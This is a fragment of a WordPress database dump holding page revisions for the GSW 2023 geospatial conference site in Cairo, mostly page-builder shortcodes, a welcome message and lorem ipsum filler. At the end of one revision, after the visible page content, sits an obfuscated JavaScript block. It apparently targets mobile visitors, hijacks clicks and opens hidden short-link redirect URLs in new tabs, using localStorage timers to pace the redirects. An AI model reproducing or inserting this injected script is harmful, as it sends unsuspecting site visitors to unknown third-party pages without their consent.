link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row equal_height=\"yes\" content_placement=\"middle\" bg_type=\"bg_color\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529517572787{padding-top: 70px !important;padding-bottom: 55px !important;}\" bg_color_value=\"rgba(170,170,170,0.1)\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"How can we help you?\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"]Our job is nisi lectus, pharetra eget leo id, hendrerit ultricies magna. Duis bibendum quam in elit accumsan, quis maximus urna venenatis.[/ultimate_heading][/vc_column][vc_column offset=\"vc_col-lg-offset-1 vc_col-lg-10 vc_col-md-offset-0 vc_col-md-12\"][vc_row_inner content_placement=\"top\"][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-users\" icon_size=\"24\" icon_color=\"\" title=\"Agile team\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529526716112{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-sitemap\" icon_size=\"24\" icon_color=\"\" title=\"Scrum\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529517895768{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-window-restore\" icon_size=\"24\" icon_color=\"\" title=\"TDD\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529517964919{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-code\" icon_size=\"24\" icon_color=\"\" title=\"Clean code\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518016290{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-thumbs-up\" icon_size=\"24\" icon_color=\"\" title=\"Quality software\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518063362{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-rocket\" icon_size=\"24\" icon_color=\"\" title=\"Innovative\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518383809{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-gem\" icon_size=\"24\" icon_color=\"\" title=\"Cost effective\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518233084{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-check-square\" icon_size=\"24\" icon_color=\"\" title=\"Transparent &amp; honest\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518135334{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-lightbulb\" icon_size=\"24\" icon_color=\"\" title=\"Creative\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518683161{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"``The time is always right to do what is right!``\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529525768333{padding-top: 70px !important;padding-bottom: 75px !important;}\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Our latest projects\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"]We provides a full spectrum s nisi lectus, pharetra eget leo id, hendrerit ultricies magna. Duis bibendum quam in elit accumsan venenatis.[/ultimate_heading][/vc_column][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-12 vc_col-md-offset-0 vc_col-md-12\"][dt_portfolio_carousel dis_posts_total=\"12\" content_alignment=\"center\" custom_content_bg_color=\"#f7f7f7\" post_content_paddings=\"20px 30px 30px 30px\" resized_image_dimensions=\"3x2\" image_border_radius=\"0px\" image_paddings=\"20px 20px 0px 20px\" slides_on_wide_desk=\"3\" slides_on_lapt=\"2\" slides_on_h_tabs=\"2\" slides_on_v_tabs=\"1\" post_title_font_size=\"22px\" post_title_line_height=\"32px\" post_date=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"default_button\" read_more_button_text=\"Details\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" next_icon=\"icon-ar-013-r\" prev_icon=\"icon-ar-013-l\" arrow_icon_size=\"32px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" arrow_icon_color=\"rgba(0,0,0,0.15)\" arrows_bg_show=\"n\" arrow_icon_color_hover=\"\" arrows_bg_hover_show=\"n\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" category=\"\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]I am text block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-04 04:58:27','2022-10-04 04:58:27','',2167,'https://gsw2023.com/?p=2278',0,'revision','',0),
(2280,1,'2022-10-04 05:21:47','2022-10-04 05:21:47','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\" margin_design_tab_text=\"\"]</p>\n<h5>As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. It is the primary factor for human achievements throughout all ages. AASTMT has a host of qualified professors and experts who are capable of supporting Arab and African countries in various scientific fields. The GSW will provide a platform for international scholars, graduate students, future scientists and industrial sectors to learn exchange knowledge and experiences of applying geospatial technologies for sustainable development for better quality of life for people around the world. We would like to take this opportunity to welcome you to Cairo a vibrant, exhilarating, exotic, fascinating and welcoming city. Home to the best Pharaonic, Coptic and Islamic sights in Egypt. Cairo is where you never know what incredible, half-forgotten monument you might stumble across while wandering around. Enjoy the Nile view, visit the great pyramids of Giza, walk through the capital\'s medieval markets by Khan El-Khalili, or walk down the Nile promenade. We look forward to working with the ISPRS council, commissions presidents, working group officers, and other sister organizations to have a successful technical program and a memorable social program. It is great to have the GSW coming to Egypt where most probably the first mapping systems were developed 1000s years ago. Welcome to GSW\'2023 in Cairo, Egypt.</h5>\n<p>[/ultimate_heading][vc_row_inner][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row equal_height=\"yes\" content_placement=\"middle\" bg_type=\"bg_color\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529517572787{padding-top: 70px !important;padding-bottom: 55px !important;}\" bg_color_value=\"rgba(170,170,170,0.1)\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"How can we help you?\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"]Our job is nisi lectus, pharetra eget leo id, hendrerit ultricies magna. Duis bibendum quam in elit accumsan, quis maximus urna venenatis.[/ultimate_heading][/vc_column][vc_column offset=\"vc_col-lg-offset-1 vc_col-lg-10 vc_col-md-offset-0 vc_col-md-12\"][vc_row_inner content_placement=\"top\"][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-users\" icon_size=\"24\" icon_color=\"\" title=\"Agile team\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529526716112{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-sitemap\" icon_size=\"24\" icon_color=\"\" title=\"Scrum\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529517895768{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-window-restore\" icon_size=\"24\" icon_color=\"\" title=\"TDD\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529517964919{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-code\" icon_size=\"24\" icon_color=\"\" title=\"Clean code\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518016290{margin-bottom: 30px !important;}\" 